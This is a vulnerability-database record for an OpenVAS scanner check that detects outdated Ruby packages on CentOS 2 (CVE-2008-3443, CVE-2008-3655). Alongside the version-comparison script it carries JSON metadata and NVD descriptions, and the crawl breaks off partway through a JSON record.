CentOS Update for ruby CESA-2008:0895-02 centos2 i386
2009-02-27T00:00:00
ID OPENVAS:880179 Type openvas Reporter Copyright (C) 2009 Greenbone Networks GmbH Modified 2017-07-10T00:00:00
Description
Check for the Version of ruby
###############################################################################
# OpenVAS Vulnerability Test
#
# CentOS Update for ruby CESA-2008:0895-02 centos2 i386
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
include("revisions-lib.inc");
tag_insight = "Ruby is an interpreted scripting language for quick and easy
object-oriented programming.
A number of flaws were found in the safe-level restrictions in Ruby. It
was possible for an attacker to create a carefully crafted malicious script
that can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)
A denial of service flaw was found in Ruby's regular expression engine. If
a Ruby script tried to process a large amount of data via a regular
expression, it could cause Ruby to enter an infinite-loop and crash.
(CVE-2008-3443)
Users of ruby should upgrade to these updated packages, which contain
backported patches to resolve these issues.";
tag_affected = "ruby on CentOS 2";
tag_solution = "Please Install the Updated Packages.";
if(description)
{
script_xref(name : "URL" , value : "http://lists.centos.org/pipermail/centos-announce/2008-October/015336.html");
script_id(880179);
script_version("$Revision: 6651 $");
script_tag(name:"last_modification", value:"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $");
script_tag(name:"creation_date", value:"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_xref(name: "CESA", value: "2008:0895-02");
script_cve_id("CVE-2008-3443", "CVE-2008-3655");
script_name( "CentOS Update for ruby CESA-2008:0895-02 centos2 i386");
script_summary("Check for the Version of ruby");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2009 Greenbone Networks GmbH");
script_family("CentOS Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/centos", "ssh/login/rpms");
script_tag(name : "affected" , value : tag_affected);
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "insight" , value : tag_insight);
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
include("pkg-lib-rpm.inc");
release = get_kb_item("ssh/login/release");
res = "";
if(release == NULL){
exit(0);
}
if(release == "CentOS2")
{
if ((res = isrpmvuln(pkg:"irb", rpm:"irb~1.6.4~7.el2", rls:"CentOS2")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"ruby", rpm:"ruby~1.6.4~7.el2", rls:"CentOS2")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"ruby-devel", rpm:"ruby-devel~1.6.4~7.el2", rls:"CentOS2")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"ruby-docs", rpm:"ruby-docs~1.6.4~7.el2", rls:"CentOS2")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"ruby-libs", rpm:"ruby-libs~1.6.4~7.el2", rls:"CentOS2")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"ruby-tcltk", rpm:"ruby-tcltk~1.6.4~7.el2", rls:"CentOS2")) != NULL)
{
security_message(data:res);
exit(0);
}
if (__pkg_match) exit(99); # Not vulnerable.
exit(0);
}
{"bulletinFamily": "scanner", "viewCount": 0, "naslFamily": "CentOS Local Security Checks", "reporter": "Copyright (C) 2009 Greenbone Networks GmbH", "references": ["http://lists.centos.org/pipermail/centos-announce/2008-October/015336.html", "2008:0895-02"], "description": "Check for the Version of ruby", "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "e35b2abbe1f69aa6d9f0da59fcea58b0"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "331b58e321264483e841023b1f76a7d1"}, {"key": "href", "hash": "fe195daad44d64f1ab57f94fe6761d9f"}, {"key": "modified", "hash": "0d134bf170d66438eb1e01173ee0187f"}, {"key": "naslFamily", "hash": "8f8213e8b86855939d5beea715ce3045"}, {"key": "pluginID", "hash": "aba41365ffc13d29947ef59ea69241ee"}, {"key": "published", "hash": "35afa346a8e2805a0b04c27bc47830d3"}, {"key": "references", "hash": "c354dbc8c0b1252ee80ebc280bd791b0"}, {"key": "reporter", "hash": "b7e844243a0b30893b9118e3563e6521"}, {"key": "sourceData", "hash": "0d1772cc44e182f9a9e56e19c3b3e169"}, {"key": "title", "hash": "a2c21c99cd7d593b0764c3c9a92b3c83"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "href": "http://plugins.openvas.org/nasl.php?oid=880179", "modified": "2017-07-10T00:00:00", "objectVersion": "1.3", "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2017-07-25T10:56:22"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-3655", "CVE-2008-3443"]}, {"type": "openvas", "idList": ["OPENVAS:870086", "OPENVAS:1361412562310870086", "OPENVAS:1361412562310880179", "OPENVAS:880190", "OPENVAS:1361412562310870065", "OPENVAS:1361412562310880190", "OPENVAS:1361412562310880056", "OPENVAS:870065", "OPENVAS:880056", "OPENVAS:1361412562310880070"]}, {"type": "centos", "idList": ["CESA-2008:0895-02", "CESA-2008:0896", "CESA-2008:0897"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2008-0895.NASL", "ORACLELINUX_ELSA-2008-0896.NASL", "REDHAT-RHSA-2008-0896.NASL", "CENTOS_RHSA-2008-0896.NASL", "MANDRIVA_MDVSA-2008-226.NASL", "FEDORA_2008-8736.NASL", "SL_20081021_RUBY_ON_SL3_X.NASL", "DEBIAN_DSA-1695.NASL", "UBUNTU_USN-651-1.NASL", "SUSE_11_RUBY-090703.NASL"]}, {"type": "redhat", "idList": ["RHSA-2008:0895", "RHSA-2008:0896", "RHSA-2008:0897"]}, {"type": "oraclelinux", "idList": ["ELSA-2008-0896", "ELSA-2008-0897"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1695-1:CB9A2", "DEBIAN:DSA-1651-1:0FC77", "DEBIAN:DSA-1652-1:B2D5C"]}, {"type": "exploitdb", "idList": ["EDB-ID:32224", "EDB-ID:6239", "EDB-ID:32223"]}, {"type": "seebug", "idList": ["SSV:4621"]}, {"type": "ubuntu", "idList": ["USN-691-1", "USN-651-1"]}, {"type": "freebsd", "idList": ["C329712A-6B5B-11DD-9D79-001FC61C2A55", "F7BA20AA-6B5A-11DD-9D79-001FC61C2A55"]}, {"type": "suse", "idList": ["SUSE-SA:2009:037"]}, {"type": "gentoo", "idList": ["GLSA-200812-17"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:21825"]}], "modified": "2017-07-25T10:56:22"}, "vulnersScore": 6.4}, "id": "OPENVAS:880179", "title": "CentOS Update for ruby CESA-2008:0895-02 centos2 i386", "hash": "f2d57c598388d67831143db3d9f7b7afd2a70d55d2b60c3909981da36390749d", "edition": 2, "published": "2009-02-27T00:00:00", "type": "openvas", "history": [{"lastseen": "2017-07-02T21:13:55", "bulletin": {"hash": "cab9f5264dfd4f791609d5f49a46eb51b6d9063c4b5ea28edd56176a42d73c0b", "viewCount": 0, "reporter": "Copyright (C) 2009 Greenbone Networks GmbH", "references": ["http://lists.centos.org/pipermail/centos-announce/2008-October/015336.html", "2008:0895-02"], "description": "Check for the Version of ruby", "hashmap": [{"key": "sourceData", "hash": "732a623f09f2715c61fdc460dde6f274"}, {"key": "pluginID", "hash": "aba41365ffc13d29947ef59ea69241ee"}, {"key": "title", "hash": "a2c21c99cd7d593b0764c3c9a92b3c83"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "naslFamily", "hash": "8f8213e8b86855939d5beea715ce3045"}, {"key": "reporter", "hash": "b7e844243a0b30893b9118e3563e6521"}, {"key": "references", "hash": "c354dbc8c0b1252ee80ebc280bd791b0"}, {"key": "published", "hash": "35afa346a8e2805a0b04c27bc47830d3"}, {"key": "description", "hash": "331b58e321264483e841023b1f76a7d1"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}, {"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "href", "hash": "fe195daad44d64f1ab57f94fe6761d9f"}, {"key": "cvelist", "hash": "e35b2abbe1f69aa6d9f0da59fcea58b0"}, {"key": "modified", "hash": "4ed7125049d645019b6eebcb04b5daf6"}], "naslFamily": "CentOS Local Security Checks", "modified": "2016-05-03T00:00:00", "objectVersion": "1.3", "href": "http://plugins.openvas.org/nasl.php?oid=880179", "published": "2009-02-27T00:00:00", "enchantments": {}, "id": "OPENVAS:880179", "title": "CentOS Update for ruby CESA-2008:0895-02 centos2 i386", "bulletinFamily": "scanner", "edition": 1, "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for ruby CESA-2008:0895-02 centos2 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an interpreted scripting language for quick and easy\n object-oriented programming.\n\n A number of flaws were found in the safe-level restrictions in Ruby. It\n was possible for an attacker to create a carefully crafted malicious script\n that can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n \n A denial of service flaw was found in Ruby's regular expression engine. If\n a Ruby script tried to process a large amount of data via a regular\n expression, it could cause Ruby to enter an infinite-loop and crash.\n (CVE-2008-3443)\n \n Users of ruby should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"ruby on CentOS 2\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-October/015336.html\");\n script_id(880179);\n script_version(\"$Revision: 3212 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-05-03 13:45:47 +0200 (Tue, 03 May 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2008:0895-02\");\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\");\n script_name( \"CentOS Update for ruby CESA-2008:0895-02 centos2 i386\");\n\n script_summary(\"Check for the Version of ruby\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"HostDetails/OS/cpe:/o:centos:centos\", \"login/SSH/success\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS2\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "type": "openvas", "history": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "cvelist": ["CVE-2008-3655", "CVE-2008-3443"], "lastseen": "2017-07-02T21:13:55", "pluginID": "880179"}, "differentElements": ["modified", "sourceData"], "edition": 1}], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "cvelist": ["CVE-2008-3655", "CVE-2008-3443"], "lastseen": "2017-07-25T10:56:22", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for ruby CESA-2008:0895-02 centos2 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an interpreted scripting language for quick and easy\n object-oriented programming.\n\n A number of flaws were found in the safe-level restrictions in Ruby. It\n was possible for an attacker to create a carefully crafted malicious script\n that can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n \n A denial of service flaw was found in Ruby's regular expression engine. If\n a Ruby script tried to process a large amount of data via a regular\n expression, it could cause Ruby to enter an infinite-loop and crash.\n (CVE-2008-3443)\n \n Users of ruby should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"ruby on CentOS 2\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-October/015336.html\");\n script_id(880179);\n script_version(\"$Revision: 6651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2008:0895-02\");\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\");\n script_name( \"CentOS Update for ruby CESA-2008:0895-02 centos2 i386\");\n\n script_summary(\"Check for the Version of ruby\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS2\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "pluginID": "880179"}
{"cve": [{"lastseen": "2019-05-29T18:09:27", "bulletinFamily": "NVD", "description": "The regular expression engine (regex.c) in Ruby 1.8.5 and earlier, 1.8.6 through 1.8.6-p286, 1.8.7 through 1.8.7-p71, and 1.9 through r18423 allows remote attackers to cause a denial of service (infinite loop and crash) via multiple long requests to a Ruby socket, related to memory allocation failure, and as demonstrated against Webrick.", "modified": "2018-10-03T21:55:00", "id": "CVE-2008-3443", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3443", "published": "2008-08-14T23:41:00", "title": "CVE-2008-3443", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:09:27", "bulletinFamily": "NVD", "description": "Ruby 1.8.5 and earlier, 1.8.6 through 1.8.6-p286, 1.8.7 through 1.8.7-p71, and 1.9 through r18423 does not properly restrict access to critical variables and methods at various safe levels, which allows context-dependent attackers to bypass intended access restrictions via (1) untrace_var, (2) $PROGRAM_NAME, and (3) syslog at safe level 4, and (4) insecure methods at safe levels 1 through 3.", "modified": "2018-10-11T20:48:00", "id": "CVE-2008-3655", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3655", "published": "2008-08-13T01:41:00", "title": "CVE-2008-3655", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2018-04-09T11:39:27", "bulletinFamily": "scanner", "description": "Check for the Version of ruby", "modified": "2018-04-06T00:00:00", "published": "2009-02-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880179", "id": "OPENVAS:1361412562310880179", "type": "openvas", "title": "CentOS Update for ruby CESA-2008:0895-02 centos2 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for ruby CESA-2008:0895-02 centos2 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an interpreted scripting language for quick and easy\n object-oriented programming.\n\n A number of flaws were found in the safe-level restrictions in Ruby. It\n was possible for an attacker to create a carefully crafted malicious script\n that can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n \n A denial of service flaw was found in Ruby's regular expression engine. If\n a Ruby script tried to process a large amount of data via a regular\n expression, it could cause Ruby to enter an infinite-loop and crash.\n (CVE-2008-3443)\n \n Users of ruby should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"ruby on CentOS 2\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-October/015336.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880179\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2008:0895-02\");\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\");\n script_name( \"CentOS Update for ruby CESA-2008:0895-02 centos2 i386\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of ruby\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS2\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.6.4~7.el2\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-27T10:56:50", "bulletinFamily": "scanner", "description": "Check for the Version of ruby", "modified": "2017-07-12T00:00:00", "published": "2009-03-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=870086", "id": "OPENVAS:870086", "title": "RedHat Update for ruby RHSA-2008:0895-02", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for ruby RHSA-2008:0895-02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an interpreted scripting language for quick and easy\n object-oriented programming.\n\n A number of flaws were found in the safe-level restrictions in Ruby. It\n was possible for an attacker to create a carefully crafted malicious script\n that can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n \n A denial of service flaw was found in Ruby's regular expression engine. If\n a Ruby script tried to process a large amount of data via a regular\n expression, it could cause Ruby to enter an infinite-loop and crash.\n (CVE-2008-3443)\n \n Users of ruby should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"ruby on Red Hat Enterprise Linux AS (Advanced Server) version 2.1,\n Red Hat Enterprise Linux ES version 2.1,\n Red Hat Enterprise Linux WS version 2.1\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2008-October/msg00010.html\");\n script_id(870086);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"RHSA\", value: \"2008:0895-02\");\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\");\n script_name( \"RedHat Update for ruby RHSA-2008:0895-02\");\n\n script_summary(\"Check for the Version of ruby\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_2.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.6.4~7.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.6.4~7.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.6.4~7.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.6.4~7.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.6.4~7.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.6.4~7.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-09T11:41:49", "bulletinFamily": "scanner", "description": "Check for the Version of ruby", "modified": "2018-04-06T00:00:00", "published": "2009-03-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870086", "id": 